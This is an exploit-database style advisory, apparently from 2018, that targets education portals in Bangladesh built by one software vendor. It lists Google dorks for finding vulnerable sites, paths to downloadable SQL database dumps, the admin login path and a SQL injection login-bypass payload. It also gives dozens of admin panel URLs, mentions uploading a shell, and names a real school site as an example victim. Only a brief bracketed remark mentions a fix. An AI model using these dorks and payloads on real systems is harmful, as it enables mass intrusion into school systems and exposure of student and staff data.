#################################################################################################
# Exploit Title : Design & Developed by SoftBd Ltd. Bangladesh Education Portals Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : soft-bd.com ~ softbdltd.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : + CWE-264 - Permissions, Privileges, and Access Controls + CWE-592 - Authentication Bypass Issues [ deprecated entry; CWE-287 - Improper Authentication is the current one ]
+ CWE-434 - Unrestricted Upload of File with Dangerous Type
#################################################################################################
# Description : The vendor describes itself as Bangladesh’s leading custom software and web application development company [ for Government and Education portals ].
+ SoftBD Ltd | Best Website Design and Development Company in Bangladesh
# Google Dorks :
intext:DEVELOPED BY : SOFTBD Ltd. site:edu.bd
inurl:''Design & Developed by : SOFTBD Ltd.'' site:edu.bd
inurl:''/teachers_information.php site:edu.bd
inurl:''/student_information.php site:edu.bd
inurl:/holiday_calendar.php site:edu.bd
inurl:''/academic_calendar.php site:edu.bd
inurl:''/rules_regulation.php site:edu.bd
inurl:''/class_routine.php site:edu.bd
inurl:''/examination_routine.php site:edu.bd
inurl:''/3rd_&_4th_class_employee_information.php site:edu.bd
inurl:''/department.php?id=MDc= site:edu.bd
inurl:''/facilities.php?id=MQ== site:edu.bd
inurl:''/general_notice.php site:edu.bd
inurl:''/admission.php?id=MDc= site:edu.bd
inurl:''/teachers_information_archive.php site:edu.bd
inurl:''academic_calendar_view.php'' site:edu.bd
+ Downloadable database SQL backups [ Navicat MySQL Data Transfer dumps containing sensitive information ] =>
TARGET/trust_college_db.sql
TARGET/school_system-current.sql
TARGET/school_system-last.sql
TARGET/school_system.sql
TARGET/school_system_fress.sql
# Administration Login Panel Path => TARGET/login_slide.php
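# Exploit : Authentication bypass via SQL injection in the login form [ both fields apparently reach the SQL query unescaped; a parameterized query closes this ] :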
Admin Username : '=''or'
Admin Password : '=''or'
# Usable Admin Control Panel URLs =>
/modules/dashboard/index.php
/modules/dashboard/school_profile.php
/modules/dashboard/calendar.php
/modules/dashboard/class_list.php
/modules/dashboard/session_list.php
/modules/dashboard/group_sms_excel_upload.php
/modules/system_module/index.php
/includes/components/sms_gateway_data_update.php
/modules/dashboard/school_social_network_link.php
/modules/dashboard/student_excel_upload.php
/modules/system_task/index.php
/modules/dashboard/teacher_excel_upload.php
/modules/dashboard/user_group.php
/modules/dashboard/user_group_role.php
/modules/accounts/tution.php
/modules/accounts/teacher_salary_add.php
/modules/accounts/keyword_setup.php
/modules/accounts/fee_setup.php
/modules/accounts/account_template.php
/modules/accounts/expenditure_add.php
/modules/accounts/due_payment_list.php
/modules/users/user_add_new.php
/modules/users/user_list.php
/modules/student/list.php
/modules/student/add_form_simple.php
/modules/student/student_promotion.php
/modules/student/student_list_report.php
/modules/student/lecture_sheet_download.php
/modules/student/advising_student.php
/modules/school_setup/basic.php
/modules/school_setup/class.php
/modules/school_setup/sms_template.php
/modules/school_setup/subject.php
/modules/school_setup/designation.php
/modules/school_setup/teacher_sarary_template.php
/modules/school_setup/class_routine.php
/modules/school_setup/period_setup.php
/modules/school_setup/school_sms_bill_payment.php
/modules/teacher/list.php
/modules/teacher/index.php
/modules/attendance/daily.php
/modules/teacher/schedule_rpt.php
/modules/teacher/lecture_sheet_upload.php
/modules/exam/exam_setup.php
/modules/exam/add_mark_list.php
/modules/exam/edit_mark_list.php
/modules/exam/exam_setup_edit_list.php
/modules/notice/sms_group_template.php
/modules/dashboard/user_group_role.php
/modules/report/student_fee_report.php
/modules/report/student_due_fee_report.php
/modules/report/teacher_salary_report.php
/modules/report/expenditure_report.php
/modules/report/income_report.php
/modules/report/account_statement_report.php
/modules/report/attendance_report.php
/modules/report/exam_report.php
/modules/report/student_exam_mark_report.php
/modules/report/std_exam_mark_rpt.php
/modules/report/sms_report.php
/modules/report/teacher_list_report.php
/modules/report/hostel_room_allocation.php
/modules/report/exam_attendance_sheet_list.php
/modules/report/exam_seat_planing_print_list.php
/modules/website/general_notice_list.php
/modules/website/departmental_notice_list.php
/modules/website/college_facilities_list.php
/modules/website/event_list.php
/modules/website/admission_list.php
/modules/website/slider_list.php
Note : On some of the vulnerable sites a shell can also be uploaded [ the CWE-434 unrestricted file upload listed above ].
#################################################################################################
# Example Vulnerable Site => uuc.edu.bd => [ Proof of Concept ] => archive.is/eGqUH
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################